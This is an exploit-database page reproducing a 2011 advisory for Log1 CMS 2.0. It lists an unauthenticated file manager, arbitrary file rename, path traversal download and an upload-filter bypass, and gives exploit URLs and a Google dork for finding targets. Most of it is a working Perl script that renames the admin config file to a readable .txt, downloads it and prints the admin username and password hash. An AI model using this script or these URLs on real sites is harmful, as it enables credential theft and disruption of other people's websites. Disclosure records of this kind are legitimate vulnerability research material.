Vulners
Lucene search
Log1 CMS File Modification / Download
`+---------------------------------------+
| Log1 CMS 2.0 Multiple Vulnerabilities |
+---------------------------------------+
Vulnerable Web-App : Log1 CMS 2.0
Vulnerability : Multiple Vulnerabilities.
Author : Aodrulez. (Atul Alex Cherian)
Email : [email protected]
Google-Dork : "POWERED BY LOG1 CMS"
Tested on : Ubuntu 10.04
Vendor : http://log1cms.sourceforge.net/
+---------+
| Details |
+---------+
This CMS suffers from multiple vulnerabilities.
1] "AjaxFileManager" implemented without the need for a valid session.
Path: http://localhost/admin/libraries/ajaxfilemanager/ajaxfilemanager.php
2] "ajax_save_name.php" can be used to rename any file on the system/www-root
to any name that contains safe extensions (txt,jpg etc)
3] "AjaxFileManager.php" allows download of even php files if its under the 'Root Folder'.
Exploit: http://localhost/admin/libraries/ajaxfilemanager/ajax_download.php?path=../../../db/uploaded/index.php
4] "main.php" can be used to upload any file-type as long as this is true : "Content-Type: image:jpeg"
Exploit:http://localhost/admin/main.php?action=upload
+--------------------+
| Exploit (Perl Code)|
+--------------------+
(This exploit will fetch Sensitive Login information
from 'http://target.com/admin/config.php' & trigger
DOS attack against the Web-Application)
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP 5.64;
my $browser = LWP::UserAgent->new();
my $url=$ARGV[0];
print "+---------------------------------------+\n";
print "| Log1 CMS 2.0 Multiple Vulnerabilities |\n";
print "+---------------------------------------+\n\n";
print "Author : Aodrulez. (Atul Alex Cherian)\n";
print "Email : f3arm3d3ar\@gmail.com\n";
print "Google-Dork : \"POWERED BY LOG1 CMS\"\n";
if(!$url)
{die ("\nPlease enter the target url. Ex. perl $0 http://www.test.com");}
my $ajaxfileman='/admin/libraries/ajaxfilemanager/ajax_save_name.php';
$response = HTTP::Request->new(POST => $url.$ajaxfileman) or die("\n Connection Error!");
$response->content_type("application/x-www-form-urlencoded");
$response->content("original_path=../../../admin/config.php&name=config.txt");
my $data=$browser->request($response)->as_string;
if($data!~m/HTTP\/1.1 200 OK/){ die ("\n$url Not Vulnerable!\n");}
$response = HTTP::Request->new(GET => $url.'/admin/config.txt') or die("\n Connection Error!");
my $data=$browser->request($response)->as_string;
$data=~ m/\"(.*?)\";\r\n.*?\"(.*?)\";/g;
print "\nAdmin Username : ".$1."\nAdmin Password : ".$2." (MD5 Hash)\n";
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.malcon.org
5] www.isac.org.in
+-------+
| Quote |
+-------+
"Learn the Rules really well so you know how to Break them in Multiple Ways." - Aodrulez
;)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4